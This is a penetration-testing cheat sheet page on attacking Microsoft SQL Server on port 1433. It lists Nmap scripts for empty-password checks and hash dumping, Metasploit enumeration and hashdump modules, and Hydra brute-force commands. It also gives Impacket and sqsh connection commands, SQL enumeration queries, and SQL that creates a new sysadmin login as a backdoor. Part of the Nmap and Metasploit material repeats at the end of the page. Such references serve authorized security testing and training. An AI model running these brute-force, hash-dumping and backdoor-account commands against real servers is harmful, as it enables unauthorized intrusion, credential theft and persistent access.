Ms-SQL 1433

1. Nmap for MSSQL Enumeration:

Search for related Nmap scripts:
```
nmap --script-help "ms and sql"
```

Run Nmap with selected MSSQL scripts:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

Run specific MSSQL scripts:

nmap --script ms-sql-info -p 1433 10.0.0.0
nmap --script ms-sql-config -p 1433 10.0.0.0
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
nmap --script ms-sql-* -p 1433 10.0.0.0

2. Metasploit Modules for MSSQL:

Common MSSQL Metasploit modules:

msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

These modules allow you to:
- Enumerate MSSQL logins and domain accounts.
- Dump hashes and retrieve database schema.

3. Bruteforcing MSSQL with Hydra:

Bruteforce with a username list:

hydra -L usernames.txt -p password 10.0.0.0 mssql

Bruteforce with a password list:

hydra -l username -P passwords.txt 10.0.0.0 mssql

4. Connecting to MSSQL with Impacket:

SQL Authentication:

impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>

Windows Authentication:

impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

5. Connecting to MSSQL with sqsh:

Basic connection:

sqsh -S <target-ip> -U username -P password

Connect to a specific database:

sqsh -S <target-ip> -U username -P password -D database

6. SQL Commands for Enumeration:

Get all users:
```
SELECT * FROM sys.database_principals;
```
Switch to a specific database:
```
USE <database>;
```
List available databases:
```
SELECT * FROM master.dbo.sysdatabases;
```

List tables within a database:

SELECT * FROM information_schema.tables;

Get content from a table:

SELECT * FROM <database_name>.dbo.<table_name>;

Get the MSSQL version:
```
SELECT @@version;
```

Check permission to execute OS commands:

USE master;
EXEC sp_helprotect 'xp_cmdshell';

Get linked servers:

EXEC sp_linkedservers;
SELECT * FROM sys.servers;

Create a new user with sysadmin privileges:

CREATE LOGIN tester WITH PASSWORD = 'password';
EXEC sp_addsrvrolemember 'tester', 'sysadmin';

Get the current username:
```
SELECT user_name();
```

PreviousOpenSSL 1337 NextOracle Listener 1521 1522 1529

Last updated 4 months ago

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

msfconsole msf> use admin/mssql/mssql_enum msf> use admin/mssql/mssql_enum_domain_accounts msf> use admin/mssql/mssql_enum_sql_logins msf> use auxiliary/admin/mssql/mssql_findandsampledata msf> use auxiliary/admin/mssql/mssql_idf msf> use auxiliary/scanner/mssql/mssql_hashdump msf> use auxiliary/scanner/mssql/mssql_schemadump